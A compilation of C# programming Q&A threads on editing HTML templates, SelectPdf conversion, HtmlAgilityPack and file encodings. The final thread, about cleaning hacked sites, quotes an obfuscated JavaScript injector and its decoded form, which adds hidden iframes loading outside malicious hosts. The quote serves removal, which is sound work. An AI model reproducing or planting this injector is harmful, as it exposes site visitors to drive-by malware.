How to read HTML template, replace text and convert back to HTML - c#

I am currently loading an HTML file from a file path and reading it as text. I then replace certain characters in the content and want to convert it back to HTML.
This is how I do it currently:
HtmlDocument document = new HtmlDocument();
document.Load(@message.Location);
content = document.DocumentNode.OuterHtml;
//Code to replace text
var eContent = HttpUtility.HtmlEncode(content);
When I debug and check what eContent holds, I can see newline characters like "\r\n". If I copy and paste the text into a .html file, only the text appears, not a proper html page.
I'm using Html AgilityPack already and am unsure of what else I need to do.
EDIT:
I have also tried
var result = new HtmlString(content);

HtmlAgilityPack is great for reading and modifying HTML files, but it will not create readable output for you.
Try with this

I have done this before using...
string savePath = "path to save html file, ie C://myfile.html";
string textRead = File.ReadAllText(@"Path of original html file");
//replace or manipulate as needed... ie textRead = textRead.Replace("", "");
File.WriteAllText(savePath, textRead);
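
The symptom described in the question (the saved file shows raw text instead of a rendered page) is what one would expect when the markup is HTML-encoded before saving. A minimal sketch of the difference, assuming System.Net.WebUtility.HtmlEncode as a stand-in for HttpUtility.HtmlEncode so the snippet runs without System.Web; the sample markup and the {name} placeholder are made up for illustration:

```csharp
using System;
using System.Net;

public static class EncodeDemo
{
    // Replaces a placeholder in raw markup; no encoding step is involved.
    public static string FillTemplate(string html, string placeholder, string value)
    {
        return html.Replace(placeholder, value);
    }

    public static void Main()
    {
        string html = "<p>Hello {name}</p>"; // hypothetical template text
        string filled = FillTemplate(html, "{name}", "World");

        // The replaced string is still markup and can be saved as-is.
        Console.WriteLine(filled);

        // Encoding escapes the angle brackets, so a browser shows the tags as text.
        Console.WriteLine(WebUtility.HtmlEncode(filled));
    }
}
```

If the goal is a working .html file, the string after replacement can be written out directly, without the encoding step.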

Try to use ContentResult, which inherits ActionResult. Just remember to set ContentType to text/html.
[HttpGet]
public IActionResult FileToTextToHtml()
{
    string fileContents = System.IO.File.ReadAllText("D:\\HtmlTest.html");
    var result = new ContentResult()
    {
        Content = fileContents,
        ContentType = "text/html",
    };
    return result;
}

Related

Converting an HTML page to PDF with a third-party tool fails with "Conversion error: Could not open url"

I am using SelectPdf to convert HTML code to PDF. When I download the PDF, I get the error "Conversion error: Could not open url". What base URL do I have to give?
using System;
using SelectPdf;
public partial class HtmlcodePrint : System.Web.UI.Page
{
    string TxtHtmlCode;
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            TxtHtmlCode = @"<html>
<body>
Hello World from selectpdf.com.
</body>
</html>
";
        }
    }
    protected void Btndownloadpdf_Click(object sender, EventArgs e)
    {
        // read parameters from the webpage
        string htmlString = TxtHtmlCode;
        string baseUrl = "http://localhost:51868/HtmlcodePrint.aspx";
        string pdf_page_size = "A4";
        PdfPageSize pageSize = (PdfPageSize)Enum.Parse(typeof(PdfPageSize),
            pdf_page_size, true);
        string pdf_orientation = "Portrait";
        PdfPageOrientation pdfOrientation =
            (PdfPageOrientation)Enum.Parse(typeof(PdfPageOrientation),
            pdf_orientation, true);
        int webPageWidth = 1024;
        try
        {
            webPageWidth = Convert.ToInt32("1024");
        }
        catch { }
        int webPageHeight = 0;
        try
        {
            webPageHeight = Convert.ToInt32("777");
        }
        catch { }
        // instantiate a html to pdf converter object
        HtmlToPdf converter = new HtmlToPdf();
        // set converter options
        converter.Options.PdfPageSize = pageSize;
        converter.Options.PdfPageOrientation = pdfOrientation;
        converter.Options.WebPageWidth = webPageWidth;
        converter.Options.WebPageHeight = webPageHeight;
        // create a new pdf document converting an html string
        PdfDocument doc = converter.ConvertHtmlString(htmlString, baseUrl);
        // save pdf document
        doc.Save(Response, false, "Sample.pdf");
        // close pdf document
        doc.Close();
    }
}
I know this is old, but I've been working with SelectPdf for a couple of days, so I'll throw in my 2 cents.
You probably don't need a baseUrl...
You don't have to give any baseUrl at all to the ConvertHtmlString function. You can just pass it the html string you want to convert and that's it.
Unless...
You only need to pass it a baseUrl if the html you're converting has relative paths in the external references (example: if you were referencing a stylesheet and wanted to use a relative path, you could provide the baseUrl to show where you wanted the stylesheet to be relative to). It's just so the converter can create the full absolute paths from the relative paths.
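
To illustrate what "creating the full absolute paths from the relative paths" means, here is a minimal sketch using the standard System.Uri class. It only demonstrates ordinary URL resolution and is not a claim about how SelectPdf works internally; the stylesheet path css/site.css is a hypothetical example:

```csharp
using System;

public static class BaseUrlDemo
{
    // Resolves a relative reference against a base URL using standard URI rules.
    public static string Resolve(string baseUrl, string relativePath)
    {
        return new Uri(new Uri(baseUrl), relativePath).AbsoluteUri;
    }

    public static void Main()
    {
        // Base URL taken from the question; "css/site.css" is a made-up relative reference.
        Console.WriteLine(Resolve("http://localhost:51868/HtmlcodePrint.aspx", "css/site.css"));
    }
}
```

With the base URL from the question, the relative stylesheet path resolves to an address on the same host, which is the kind of location a converter would then have to be able to open.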
So...
If you don't need that functionality or just don't have external references in your html, then you can just use
converter.ConvertHtmlString(htmlString);
Also...
doc.Save(Response, false, "Sample.pdf");
may not be what you're looking for either. I only say this because the comments look like the same ones in the examples on the SelectPdf site, so I'm assuming you copied the code from there (which is what I originally did too). In that case, I want to let you know that you don't have to save your PDF doc with that particular version of Save. It actually has 4 overloads that let you save your doc as:
a byte array (default)
a stream
a file
an HTTP response (the one you're using now, as shown in the examples from the site)
So, as I pointed out, you're using the one that saves the PDF as an HTTP response. If you want to save it as an actual PDF file directly, you'll need to change it to
doc.Save(fileName)
with the fileName variable as the absolute or relative path or file name you want to save the PDF to.
Hope this helps

Write in html with variables, then reset to default

I'm trying to edit an HTML file I have created.
When the user types something into the text box, it changes the value in the file, but then I want the file to reset.
I got the text change working, but the file stays changed, and a second attempt does not work unless I manually edit the .html file.
Here's my code:
const string fileName = "txt.html";
var content = File.ReadAllText(fileName);
content = content.Replace("{0}", textBox1.Text);
File.WriteAllText(fileName, content);
Process.Start(fileName);
I tried adding something like this after that code, but then the page just opens showing the placeholder '{0}':
var content2 = File.ReadAllText(fileName);
content2 = content2.Replace(textBox1.Text, "{0}");
File.WriteAllText(fileName, content2);
You need a separate template HTML file. Every time, read that template and replace the value in it:
const string fileName = "txt.html";
const string templateFileName = "txtTemplate.html";
var content = File.ReadAllText(templateFileName);
content = content.Replace("{0}", textBox1.Text);
File.WriteAllText(fileName, content);
Process.Start(fileName);
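
To show why the template approach survives repeated runs, here is a small self-contained sketch. The Render helper and the temporary directory are assumptions for illustration; the file names mirror the ones in the answer:

```csharp
using System;
using System.IO;

public static class TemplateDemo
{
    // Reads the template, fills the placeholder, and writes a separate output file.
    // The template file itself is never modified, so "{0}" is always there next time.
    public static string Render(string templatePath, string outputPath, string value)
    {
        string content = File.ReadAllText(templatePath).Replace("{0}", value);
        File.WriteAllText(outputPath, content);
        return content;
    }

    public static void Main()
    {
        // Work in a throwaway directory so the sketch does not touch real files.
        string dir = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
        Directory.CreateDirectory(dir);
        string template = Path.Combine(dir, "txtTemplate.html");
        string output = Path.Combine(dir, "txt.html");
        File.WriteAllText(template, "<p>{0}</p>");

        Console.WriteLine(Render(template, output, "first"));
        Console.WriteLine(Render(template, output, "second")); // second run still finds {0}
    }
}
```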

How to open txt file on localhost and change its content

I want to open a CSS file using C# 4.5 and change only one file at a time.
Doing it like this gives me the exception: URI formats are not supported.
What is the most effective way to do it?
Can I find the line and replace it without reading the whole file?
Can I find the line I am looking for and then insert text from there until the cursor reaches a certain character?
public void ChangeColor()
{
string text = File.ReadAllText("http://localhost:8080/game/Css/style.css");
text = text.Replace("class='replace'", "new value");
File.WriteAllText("D://p.htm", text);
}
I believe File.ReadAllText is expecting a file path, not a URL.
No, you cannot search/replace sections of a text file without reading and re-writing the whole file. It's just a text file, not a database.
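
Although the file still has to be rewritten as a whole, it does not have to be held in memory all at once. A minimal sketch, assuming a local file path; the ReplaceInFile helper and the ".tmp" suffix are illustrative choices, not part of the original answers:

```csharp
using System;
using System.IO;

public static class LineRewriteDemo
{
    // Streams the source line by line into a temporary file, replacing text as it goes,
    // then swaps the temporary file in place of the original.
    // Note: line endings become Environment.NewLine and the output is written as UTF-8.
    public static void ReplaceInFile(string path, string oldText, string newText)
    {
        string tempPath = path + ".tmp";
        using (var writer = new StreamWriter(tempPath))
        {
            foreach (string line in File.ReadLines(path))
            {
                writer.WriteLine(line.Replace(oldText, newText));
            }
        }
        File.Delete(path);
        File.Move(tempPath, path);
    }

    public static void Main()
    {
        // Throwaway file so the sketch does not touch real data.
        string path = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName() + ".css");
        File.WriteAllText(path, "a\nclass='replace'\nb\n");

        ReplaceInFile(path, "class='replace'", "new value");
        Console.WriteLine(File.ReadAllText(path));
    }
}
```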
The most effective way to do it is to declare any control whose CSS you want to alter as "runat=server" and then modify its CssClass property. There is no known alternative way to modify the CSS file directly. Anything else is just a hack, and a very inefficient way to do it.
As mentioned before, File.ReadAllText does not support URLs. The following is a working example with WebRequest:
{
    // Needs: using System; using System.IO; using System.Net;
    Uri uri = new Uri("http://localhost:8080/game/Css/style.css");
    WebRequest req = WebRequest.Create(uri);
    WebResponse web = req.GetResponse();
    Stream stream = web.GetResponseStream();
    string content = string.Empty;
    using (StreamReader sr = new StreamReader(stream))
    {
        content = sr.ReadToEnd();
    }
    // Strings are immutable: Replace returns a new string, so assign the result.
    content = content.Replace("class='replace'", "new value");
    using (StreamWriter sw = new StreamWriter("D://p.htm"))
    {
        sw.Write(content);
        sw.Flush();
    }
}

How to find image tags in source code using C#?

I am working with C# and have stored a web page's content in a single variable. I have a text box; if I paste any URL into it, it shows the full source code of that link. Now I want to find all the image tags, where each one begins and where it ends. I would also like to merge everything except the image tags.
Can anyone tell me how to do this?
Assuming you want to parse the content server-side you can use the Html Agility pack
See this question
Try This:
var images = doc.DocumentNode.SelectNodes("//img");
if (images != null)
{
    foreach (HtmlNode image in images)
    {
        var alt = image.GetAttributeValue("alt", "");
        var nodeForReplace = HtmlTextNode.CreateNode(alt);
        image.ParentNode.ReplaceChild(nodeForReplace, image);
    }
}
var sb = new StringBuilder();
using (var writer = new StringWriter(sb))
{
    doc.Save(writer);
}

Can a file be read and written right back with small changes without knowing its encoding in C#?

I need to download over 5000 files from FTP, all of them .html and .php files. I need to read each file, remove some content that was put there by a virus, and save it back to FTP.
I'm using the following code:
string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true))
{
    content = sr.ReadToEnd();
    sr.Close();
}
using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
    sw.WriteLine(content);
    sw.Close();
}
I downloaded some files by hand and some have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> but I wouldn't want to assume all of them are like that. I checked with Notepad++ and some text files are ANSI. PHP seems to be UTF-8 and HTML Windows-1250 but I would prefer to be sure to not break the files while trying to fix it. So is there a way that I wouldn't have to know/guess the encoding and it would let me remove virus links from web pages?
Edit. I'm trying to find and remove something like this:
var s=new
String();try{document.rvwrew.vewr}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u,
59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,82/u,29.5*u,204/u,
23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{doc.qwe.removeChild()}catch(q){e(s);}
which after decoding is
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
And when you visit the web page, it gives you this (after decoding):
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
The script is added at last 3 lines and basically starts right after </html>var
The PHP script has more or less this type of line <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.
Not sure if there's any other way than to rewrite those files. But having to go through 5000 files seems a bit too much and risky :-)
Assuming that none of the files are UTF16 or UTF32, and that the parts that you want to interact with are entirely 7-bit ASCII, you can open and save it as Encoding.Default, which will round-trip any higher character correctly.
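
A hedged sketch of this idea follows. It swaps in ISO-8859-1 (Latin-1) instead of Encoding.Default, because Latin-1 maps every byte value to exactly one character and back, whereas Encoding.Default depends on the runtime (on .NET Core and .NET 5+ it is UTF-8, where bytes that are not valid UTF-8 would not survive the round trip). The RemoveAscii helper and the sample bytes are made up for illustration:

```csharp
using System;
using System.Text;

public static class Latin1Demo
{
    // ISO-8859-1 maps each byte 0x00-0xFF to the code point with the same value,
    // so decoding and re-encoding leaves untouched bytes exactly as they were.
    private static readonly Encoding Latin1 = Encoding.GetEncoding("ISO-8859-1");

    // Removes an ASCII-only pattern from data without interpreting the other bytes.
    public static byte[] RemoveAscii(byte[] data, string asciiPattern)
    {
        string text = Latin1.GetString(data);
        return Latin1.GetBytes(text.Replace(asciiPattern, ""));
    }

    public static void Main()
    {
        // 0xB9 and 0xE6 stand in for non-ASCII bytes such as a windows-1250 file might contain.
        byte[] input = { 0xB9, (byte)'<', (byte)'x', (byte)'>', 0xE6 };
        byte[] output = RemoveAscii(input, "<x>");
        Console.WriteLine(BitConverter.ToString(output));
    }
}
```

The same assumptions as in the answer apply: the files must not be UTF-16 or UTF-32, and the text being removed must be plain 7-bit ASCII.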
The virus didn't need to know the file encoding in order to add its content to your files so it is obviously possible. Rather than treating the file as text, couldn't you just process it as a binary file and search for patterns that match what the virus added?
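
The binary approach could look roughly like the sketch below. It assumes the injected content can be identified by a fixed byte sequence, which may not hold for the obfuscated script shown in the question (a real cleanup would likely need to match from a known start marker to a known end marker). RemovePattern and the sample marker are hypothetical:

```csharp
using System;
using System.Collections.Generic;
using System.Text;

public static class BinaryCleanDemo
{
    // Returns a copy of data with every occurrence of pattern removed.
    // All other bytes are copied unchanged, so the file's encoding never matters.
    public static byte[] RemovePattern(byte[] data, byte[] pattern)
    {
        var result = new List<byte>(data.Length);
        int i = 0;
        while (i < data.Length)
        {
            if (MatchesAt(data, i, pattern))
            {
                i += pattern.Length; // skip the injected bytes
            }
            else
            {
                result.Add(data[i]);
                i++;
            }
        }
        return result.ToArray();
    }

    // True when pattern occurs in data starting at offset; an empty pattern never matches.
    private static bool MatchesAt(byte[] data, int offset, byte[] pattern)
    {
        if (pattern.Length == 0 || offset + pattern.Length > data.Length) return false;
        for (int j = 0; j < pattern.Length; j++)
        {
            if (data[offset + j] != pattern[j]) return false;
        }
        return true;
    }

    public static void Main()
    {
        byte[] marker = Encoding.ASCII.GetBytes("<iframe>"); // made-up marker
        byte[] input = { 0xB9, 0x3C, 0x69, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x3E, 0xE6 };
        Console.WriteLine(BitConverter.ToString(RemovePattern(input, marker)));
    }
}
```

For real files, the input would come from File.ReadAllBytes and the result would go to File.WriteAllBytes, ideally to a new file first so the originals remain available for comparison.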
